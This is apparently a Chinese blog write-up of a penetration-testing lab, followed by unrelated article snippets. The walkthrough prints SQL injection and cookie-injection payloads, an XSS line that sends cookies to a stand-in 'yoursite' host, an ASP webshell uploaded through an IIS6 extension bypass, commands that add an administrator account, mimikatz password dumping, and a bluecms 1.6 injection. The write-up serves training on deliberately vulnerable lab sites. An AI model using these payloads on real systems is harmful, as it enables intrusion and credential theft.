程序员经验分享-hwhale

尤里的复仇Ⅰ 小芳!

2023-10-30

尤里的复仇Ⅰ 小芳!

第一章:为了女神小芳!
找到get参数id,使用"1'","1 or 1=1","1 or 1=2"测试,发现存在sql注入。最终payload为"id=1 and 1=2 union select 1,password from admin"。

第二章:遇到阻难!绕过WAF过滤!
在首页第一条新闻测试"shownews.asp?id=171",用"id=171 order by 1"测试,在11的时候报错,由此判断查询语句中有10个字段。再使用联合查询时,提示有非法字符,尝试绕过无果,转向cookie注入(asp中经常出现)。将get参数移至cookie处,网站正常返回数据1e94477e528407e0eb16baaebef396a.png
接着尝试联合查询,waf没有拦截,并得到回显位置1201b360b43da22973c77c280a5276f.png
盲猜表名(admin),列名(username,password),拿到admin密码登录后台,得到flag

第三章:为了更多的权限!留言板!
打开链接看到一个留言板,在所有字段中输入"<script>alert(1)</script>",出现弹窗,找到弹窗的位置再次留言"<script>window.open('http://yoursite/cookie.php?cookie='+document.cookie)</script>",接着在自己服务器日志中找到flag0b37a122551ba1aaaac626e070b69f4.png
第四章:进击!拿到Web最高权限!
用第三章拿到的cookie进入后台,在产品管理-添加产品有上传点,上传一句话木马(<%eval request("chopper")%>),被阻止,返回允许的后缀名,其中".cer"在iis6中默认是可以解析的,修改后缀名重新上传,网站对文件大小作有限制,文件后多加些0补充。最后用蚁剑连接c6dd5dd0e365d40cbcfe99e999cc2df.png
第五章:SYSTEM!POWER!
目前拿到的shell不能执行命令,自己上传一个cmd文件(注意版本),还有iis6.exe(iis6溢出提权,"systeminfo"查看补丁情况),使用'iis6.exe "net user test 123456 /add"','iis6.exe "net localgroup administrators test /add"'创建用户,加入管理员组,test用户已经存在了,换个用户名

使用"taskkill /svc"查看运行的服务,找到"TermService"服务和它的pid,再使用"netstat -ano"查看端口,找到pid对应的端口。远程桌面连接ddd3e1aee99fe96134bdf5a39298938.png
第六章:GET THE PASS!
在内存中找到administrator的密码,这里要用到"mimikatz.exe",打开输入两条命令:"privilege::debug","sekurlsa::logonpasswords"580f56acbd58e4ee7ae5a9b4833e1c3.png
萌新也能找CMS漏洞
bluecms1.6有sql注入漏洞,注入点在"bluecms/uploads/ad_js.php?ad_id=1%20union%20select%201,2,3,4,5,6,database()",拿到密码登录后台,有个修改模板的地方,模板的文件位置没找到,但有文件包含漏洞,修改"../../info.php"这个文件,插入一句话木马,拿到shell,但是没找到flag

最后一个爆破没做,这些网站全部在一台主机上,直接从数据库拿到flag提交了

标签: 渗透, getshell, 提权, 靶场

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

尤里的复仇Ⅰ 小芳! 的相关文章

  • Kotlin 25. Kotlin中如何引用其他xml中的view对象

    Kotlin 中如何引用其他xml中的view对象 比如 我们的 activity main xml 这么写

  • GPU是如何优化运行机器学习算法的?

    在机器学习中 绝大多数任务会涉及到耗费时间的大量运算 而且随着数据集的增加 运算量会越来越大 解决这个问题的一个方法就是使用多线程 在这篇文章中 我要结合代码介绍一下 GPU 加速 它是如何完成的 以及用于 GPU 任务的简单 API 下面

  • 三分钟入门Three.js:如何用JavaScript构建3D场景

    在Web开发中 三维图形越来越受到重视 而Three js作为一款基于WebGL的JavaScript 3D渲染库 为我们提供了一种简单 快捷的方式来创建复杂的3D场景 如果您刚开始学习Three js并想快速入门 那么本文将为您介绍如何用

  • 案例剖析

    产品与用户的交互离不开产品任务 尤其是B端产品 由多个任务构成 而每个任务的执行都对应着一或多条流程 流程完成的好坏与交互体验 产品目标的完成直接相关 产品流程优化是从企业整体业务流程目标出发 对当前流程进行充分梳理和显性化 在流程梳理清晰

  • 【MATLAB第11期】#源码分享

    MATLAB第11期 源码分享 时间序列数据绘图 横坐标更改为时间轴 横坐标轴参数更改 绘图问题解决方案 1 导入数据方式 识别时间数据 2 案例展示 1 打开数据 2 定义时间和数据 3 将时间数据转化为数值 4 绘图 绘图问题解决方案

  • AVRoutePickerView 和 MPVolumeView 投屏

    最近小萌的项目有投屏的需求 开始使用的是保利威的SDK 但是保利威的SDK不管iOS或者Android都是只支持乐播投屏 但是我们项目的需求是AirPlay投屏 在我查找很多资料的过程中发现AVRoutePickerView和MPVolum

  • Linux性能优化实战CPU篇之软中断(三)

    Python微信订餐小程序课程视频 https edu csdn net course detail 36074 Python实战量化交易理财系统 https edu csdn net course detail 35475目录 一 软中断

  • msvcr120.dll丢失怎样修复,学这三招就可以修复好

    年前才买的新电脑 今天在打开软件ps软件的时候 电脑就提升msvcr120 dll文件丢失 无法执行此代码 刚刚开始以为是电脑的系统没有装好 经过我一下午时间的研究 原来是电脑msvcr120 dll文件丢失一般都是下载到垃圾软件 导致ms

  • Linux 临时增加环境变量

    增加环境变量 export name value 改变PATH环境变量 export PATH value PATH 这种方法只能临时增加环境变量 关闭shell窗口再打开就失效

  • 如何制作启动盘U盘(纯净版无捆绑)

    如何制作启动盘U盘 纯净版无捆绑 第一步 进入网站下载最新的镜像文件 网站地址 https msdn itellyou cn 如图所示 找到需要下载的展开详细信息 把链接复制下来 打开迅雷软件 会弹出下载链接界面 第二步 下载 rufus

  • CAS和多线程密切相关的东西!

    compare and swap 寄存器A的值和内存M的值进行比较 如果值相同 就把寄存器B和M的值进行交换 更多的时候 不关心寄存器中的数量是啥 更关心内存的数值 变量的值 CAS相当于是把开了新世界的大门 让咱们不加锁就能保证线程安全

  • Linux 搭建 MariaDB Galera Cluster 高可用集群

    MariaDB Galera Cluster 集群介绍 MariaDB Galera Cluster 下文简称MGC集群 是一套在MySQL innodb存储引擎上面实现多主 数据实时同步以及强一致性的关系存储架构 业务层面无需做读写分离工

  • rtklib中的基线约束应对观测条件糟糕的GNSS数据

    文章目录 问题 观测数据质量很差 使用基线约束后和约束前的结果对比 基线约束的原理 问题 观测数据质量很差 最近遇到一个难题 采集了500小时的数据 可是只有大约50 的的数据可以解算 呃 基线长度大约5公里 也算不上长基线 对这批数据进行

  • 串的模式匹配算法-BF算法+KMP算法

    BF算法 include

  • Spring Boot 中的 KafkaTemplate 是什么,原理,如何使用

    Spring Boot 中的 KafkaTemplate 是什么 原理 如何使用 Kafka 是一个流行的分布式消息系统 它可以用于在应用程序之间传递消息 Spring Boot 提供了对 Kafka 的支持 我们可以使用 Spring B

  • org.springframework.beans.factory.UnsatisfiedDependencyException异常问题的解决

    最近学了IDEA和SpringBoot MyBatis了 正所谓学以致用 于是用所学的来做项目 单元测试时报了下面的异常 Caused by org springframework beans factory UnsatisfiedDepe

  • WPF 在XAML中通过控件事件改变另一控件属性

    使用WPF进行开发 很多时候是要注意UI和后台代码的分离 尤其是要改变WinForm中的事件驱动机制 可是近期的开发遇到了这样一个问题 就是当一个控件的事件触发时 改变同级别的另一控件的属性 文字能力实在单薄 还是通过具体例子来说吧 首先

  • 深度学习训练模型的硬件条件

    之前热衷于学习理论知识 目前想跑代码了发现不知道从何下手 自己电脑上搭建的平台基本就是个摆设 因为跑不起来呀 今天我们就来看看想做深度学习应该怎么下手 首先了解下基础知识 1 深度学习用cpu训练和用gpu训练的区别 1 CPU主要用于串行

  • linux 上运行jxbrower出现的问题

    最近做了一个jxbrower抓取微信公众号文章的程序 想着挂在linux上定时运行 布上去却有几个问题这边总结一下 我得服务器是ubuntu16版本的 1 在linux无桌面的版本运行需要用x server运行 2 就是linux的Chro

  • L2-1 包装机PTA

    一种自动包装机的结构如图 1 所示 首先机器中有 N 条轨道 放置了一些物品 轨道下面有一个筐 当某条轨道的按钮被按下时 活塞向左推动 将轨道尽头的一件物品推落筐中 当 0 号按钮被按下时 机械手将抓取筐顶部的一件物品 放到流水线上 图 2

随机推荐

  • qt中drawline函数的参数_Qt--基础图形绘制

    一 基础图形绘制 A Qt图形系统中的关键角色 QPainter Qt中的画家 能够绘制各种基础图形 拥有绘图所需的画笔 画刷 字体 QPaintDevice Qt中的画布 画家的绘图板 所有的QWidget类都继承自QPaintDevic

  • (小白学java)Java 循环结构

    Java中有三种主要的循环结构 while 循环 do while 循环 for 循环 while 循环 和c很像了 不多写了 public class demo public static void main String args in

  • Javascript设计模式-10-迭代器模式

    Javascript设计模式 10 迭代器模式 简介 提供一种方法 顺序访问一个聚合对象中各个元素 而又不需要暴露该方法中的内部表示 迭代器模式可以把迭代的过程从业务逻辑中分离出来 在使用迭代器模式之后 即使不关心对象的内部构造 也可以按顺

  • 个人养老话题

    中国家庭的财富保卫战有三大战场 1 生娃 2 买都市圈里的好房子 3 买好股 好基

  • 【RSA】RSA加密、解密、签名与验证

    前言 最近要做iOS SDK的联网授权 涉及到数据安全验证 因此想到使用RSA进行签名和验证 授权主要流程如下 1 客户方前往我方开放平台注册授权 得到AppId和AppSecret 2 客户方集成SDK 调用Register接口传入App

  • 【数据采集】获取网站数据(二)

    获取网站数据 二 1 常用的数据采集python库 Beautiful Soup https www crummy com software BeautifulSoup bs4 doc zh pyspider http docs pyspi

  • 领域建模概述

    0 概述 在软件工程中 有两个高阶的工作的分别是架构和建模 如果把写代码比喻成施工 那么架构和建模就是设计图纸 相比编码 那么建模的确是对设计经验和抽象能力要求更高的一种技能 本文主要探讨一下对领域建模相关知识的理解 1 什么是领域建模 1

  • 算法:通过迪杰斯特拉(Dijkstra)算法,求出图中任意顶点到其他顶点的最短路径

    请看如下的示例图 该图有 V1 V7 七个顶点 每个顶点之间的距离 路径走向如图所示 假设这是一幅地图 我们很多时候都需要搜路径 比如从家到公司的路线图 也就是说 家是一个点 公司是另一个点 上图的各个点可以想象成分岔路口 当然 如果你不在

  • 安装Apache Atlas遇到的错误

    安装apache atlas 启动atlas server报错 查看logs atlas 20220524 115239 out文件 Caused by org springframework beans factory Unsatisfi

  • mysql从视图中获取字段值_MYSQL中视图的使用

    1 什么是视图 执行一条SQL 将结果集保存在一张虚拟表中 2 为什么要使用视图 重复利用SQL语句 简化SQL查询 快速取数据 只用知道表的部分结构 保护数据 根据特定授权 更改数据格式和表示 视图可返回与底层表的表示和格式不同的数据 注

  • maven私有仓库nexus3.5搭建与使用

    maven私有仓库nexus3 5搭建与使用 参考网址 http blog csdn net clj198606061111 article details 52200928 http www cnblogs com jingmoxukon

  • leetcode刷题日志4.0

    目录 前言 1 三个数的最大乘积 2 错误的集合 3 机器人能否返回原点 4 最长连续递增序列 5 验证回文串 II 6 交替位二进制数 前言 五一假期结束了 大家玩的开心吗 不过我们还得回到我们的日常生活学习工作当中 那今天我就分享一下我

  • 性能测试最佳实践的思考,7个要点缺一不可!

    性能测试是软件开发和应用过程中至关重要的环节 它是评估系统性能 稳定性和可扩展性的有效手段 可以确保软件在真实环境中高效运行 在现代技术快速发展的时代 性能测试的重要性愈发显著 性能测试在软件开发和应用过程中的重要性不可低估 它是保障用户体

  • 预编码技术

    预编码的基本原理 TD LTE下行传输采用了MIMO OFDM的物理层构架 通过最多4个发射天线并行传输多个 最多4个 数据流 能够有效地提高峰值传输速率 LTE的物理层处理过程中 预编码是其核心功能模块 物理下行共享信道的几种主要传输模式

  • The ‘import.meta‘ meta-property is only allowed when the ‘--module‘ option is ‘esnext‘ or ‘system‘

    问题描述 使用vite的import meta const allImage import meta glob assets images console log allImage 报提示 需要配置 module option为exnext

  • 根据fabric官方文档,自己整理hello world的过程中出现的bug

    在对fabric的官方文档下的 fabric samples中的test network项目中的network sh的分析 进行到创建通道时候又出现了之前出现的bug Error got unexpected status BAD REQU

  • mysql查询练习(二)

    11 查询每门课的平均成绩 查询3 105课程的平均分 mysql gt select avg degree from score where cno 3 105 avg degree 81 7500 1 row in set 0 00 s

  • 零拷贝( Zero-copy )

    一 背景 零拷贝 描述了计算机操作 其中CPU 不执行将数据从 一个存储区 复制到 另一个存储区 的任务 通过网络传输文件时 通常用于节省CPU周期和内存带宽 在传统的 Linux 操作系统的标准 I O 接口是基于数据拷贝操作的 即 I

  • C++基本语句(一)

    学习C 的第二天 一 C 的基本语句 1 1声明语句和变量 P21 P22 声明语句和变量 各自的作用是什么 为什么变量必须要声明 以及下面这段代码提供了哪两项信息 定义一个整型变量 int carrots 定义一个整型变量 int car

  • 尤里的复仇Ⅰ 小芳!

    尤里的复仇 小芳 作者 admin 时间 2021 06 15 分类 封神台 第一章 为了女神小芳 找到get参数id 使用 1 1 or 1 1 1 or 1 2 测试 发现存在sql注入 最终payload为 id 1 and 1 2

热门标签